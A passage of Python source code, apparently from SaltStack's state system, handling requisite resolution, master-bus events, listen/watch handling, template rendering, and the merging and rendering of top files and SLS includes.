else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
If the `state_events` is set to True in the config, then after the
chunk is evaluated an event will be set up to the master with the
results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(chunk_ret["name"])], "state_result",
)
elif isinstance(fire_event, str):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(fire_event)], "state_result",
)
else:
tag = salt.utils.event.tagify(
[self.jid, "prog", self.opts["id"], str(chunk_ret["__run_num__"])],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost["require_any"]
or lost["watch_any"]
or lost["onfail_any"]
or lost["onchanges_any"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in lost.items():
if not lreqs:
continue
comment += "{}{}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{}{}: {}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
# Prereq recusive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
# determine what the requisite failures where, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in reqs.values():
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
# use SLS.ID for the key-- so its easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {}".format(
", ".join(str(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
for sub_state_data in running[tag].pop("sub_state_run", ()):
start_time, duration = _calculate_fake_duration()
self.__run_num += 1
sub_tag = _gen_tag(sub_state_data["low"])
running[sub_tag] = {
"name": sub_state_data["low"]["name"],
"changes": sub_state_data["changes"],
"result": sub_state_data["result"],
"duration": sub_state_data.get("duration", duration),
"start_time": sub_state_data.get("start_time", start_time),
"comment": sub_state_data.get("comment", ""),
"__state_ran__": True,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in l_in.items():
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in l_dict.items():
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in listen_to.items():
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {}: {} does not exist".format(
lkey, lval
),
"name": "listen_{}:{}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in crefs.items()
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {}: {} does not exist".format(
key[0], key[1]
),
"name": "listen_{}:{}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in crefs.items()
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{}' declaration found on '{}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
# Is this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {} in template {} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{}' in template {} contains a short "
"declaration ({}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in template '{}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class LazyAvailStates:
"""
The LazyAvailStates lazily loads the list of states of available
environments.
This is particularly usefull when top_file_merging_strategy=same and there
are many environments.
"""
def __init__(self, hs):
self._hs = hs
self._avail = {"base": None}
self._filled = False
def _fill(self):
if self._filled:
return
for saltenv in self._hs._get_envs():
if saltenv not in self._avail:
self._avail[saltenv] = None
self._filled = True
def __contains__(self, saltenv):
if saltenv == "base":
return True
self._fill()
return saltenv in self._avail
def __getitem__(self, saltenv):
if saltenv != "base":
self._fill()
if self._avail[saltenv] is None:
self._avail[saltenv] = self._hs.client.list_states(saltenv)
return self._avail[saltenv]
def items(self):
self._fill()
ret = []
for saltenv, states in self._avail:
ret.append((saltenv, self.__getitem__(saltenv)))
return ret
class BaseHighState:
"""
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Lazily gather the lists of available sls data from the master
"""
return LazyAvailStates(self)
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(state_top_saltenv, str):
state_top_saltenv = str(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in tops.items():
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in include.items():
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in tops.items():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in tops.items():
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in ctop.items():
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, str):
states.append(item)
return match_type, states
top = DefaultOrderedDict(OrderedDict)
for ctops in tops.values():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in tops.items():
if saltenv == "include":
continue
if not isinstance(saltenv, str):
errors.append(
"Environment {} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in matches.values():
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in slsmod.values():
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {}: {} file".format(slsmod, val)
)
elif isinstance(slsmod, str):
# This is a sls module
if not slsmod:
errors.append(
"Environment {} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in top.items():
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in body.items():
def _filter_matches(_match, _data, _opts):
if isinstance(_data, str):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in _tmpdata.items():
_filter_matches(match, data, _opts)
if isinstance(item, str):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False, context=None):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {} in saltenv {} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
context=context,
)
except SaltRenderError as exc:
msg = "Rendering SLS '{}:{}' failed: {}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {} failed, render error: {}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{}\n{}".format(msg, traceback.format_exc()))
try:
mods.add("{}:{}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{}' found in include "
"of '{}' within SLS '{}:{}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {0} found in include "
"in SLS '{2}:{3}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{}' "
"within SLS '{}:{}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{}:{}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {}: {} is not available on the salt "
"master in saltenv(s): {} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {}: {} is available on the salt master "
"in multiple available saltenvs: {}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, str):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
# Include's or excludes as lists?
continue
